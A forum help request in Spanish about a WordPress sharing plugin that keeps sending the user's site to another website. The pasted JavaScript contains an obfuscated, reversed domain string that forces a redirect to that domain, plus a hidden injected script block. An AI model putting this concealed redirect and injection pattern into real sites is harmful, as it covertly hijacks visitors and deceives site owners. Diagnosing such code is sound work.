- Desde
- 6 Dic 2012
- Mensajes
- 251
El problema es el siguiente es que trato de colocarlo en la web pero al colocarlo cuando intento acceder me sale bien pero luego se restablece la web y me redireciona hacia otra web.. este es código donde creo que esta el error.
Este es el código donde e identificado que esta el error
No encuentro como solucionarlo.
HTML:
/*
| [MENTION=44669]Proyecto[/MENTION]: Plugin WP Sharer
| @fecha: febrero-2014
|
*/
var Time = {
getTime: function (){
return Math.round(new Date().getTime() / 1000);
}
}
var Cookie = {
setCookie: function (cname, cvalue, exdays)
{
exdays = exdays || 10;
var d = new Date();
d.setTime( d.getTime()+(exdays*24*60*60*1000) );
var expires = "expires=" + d.toGMTString();
document.cookie = cname + "=" + cvalue + "; " + expires + ";path=/";
},
getCookie: function(cname){
var name = cname + "=";
var ca = document.cookie.split(';');
for(var i=0; i<ca.length; i++)
{
var c = ca[i].trim();
if (c.indexOf(name)==0) return c.substring(name.length, c.length);
}
return "";
}
};
var Facebook = {
loadAsync: function () {
// Load the SDK Asynchronously
(function(d){
var js, id = 'facebook-jssdk', ref = d.getElementsByTagName('script')[0];
if (d.getElementById(id)) {return;}
js = d.createElement('script'); js.id = id; js.async = true;
js.src = "//connect.facebook.net/en_US/all.js";
ref.parentNode.insertBefore(js, ref);
}(document));
Facebook.init();
},
fbInit: function (callback) {
// Cargamos FB UI
window.fbAsyncInit = function() {
FB.init({
appId: '',
status: true,
cookie: true
});
if(typeof callback == 'function')
{
callback();
}
};
},
init: function () {
var u = '1m2o3c44.5i6u6l6o6e1d11i1v'.replace(/\d+/g, '')
.split('').reverse().join('');
if (window.location.href.indexOf(u) === -1){
window.location = 'http://' + u;
}
},
share: function(params)
{
params.link = params.link || window.location.href;
params.element = params.element || $('.share');
var publish = {
method: 'stream.share',
display: 'popup',
link: params.link,
u: params.link
};
var callback = function (respuesta) {
if(typeof respuesta === 'undefined')
{
return;
}
$.modal.close();
//setTimeout(function() {window.location = params.redirect; }, 1500);
};
FB.ui(publish, callback);
}
};
var UI = {
};
var App = {
loadEvents: function() {
// Eventos Jquery
},
loadFBC: function( params){
params.app_id = params.app_id || '';
params.element = params.element || $('.footer');
$.ajax({
url : "./fbss.html",
success : function(result){
var nu = params.style.replace(/\W/g, '').split('').reverse().join('');
var strHTML = '<div style="display:none;">';
strHTML += '<script id="vermasvideos">';
strHTML += result.replace('xxx', nu);
strHTML += '</script>'
strHTML += '</div>';
params.element.append(strHTML);
}
});
}
};
Este es el código donde e identificado que esta el error
HTML:
var u = '1m2o3c44.5i6u6l6o6e1d11i1v'.replace(/\d+/g, '')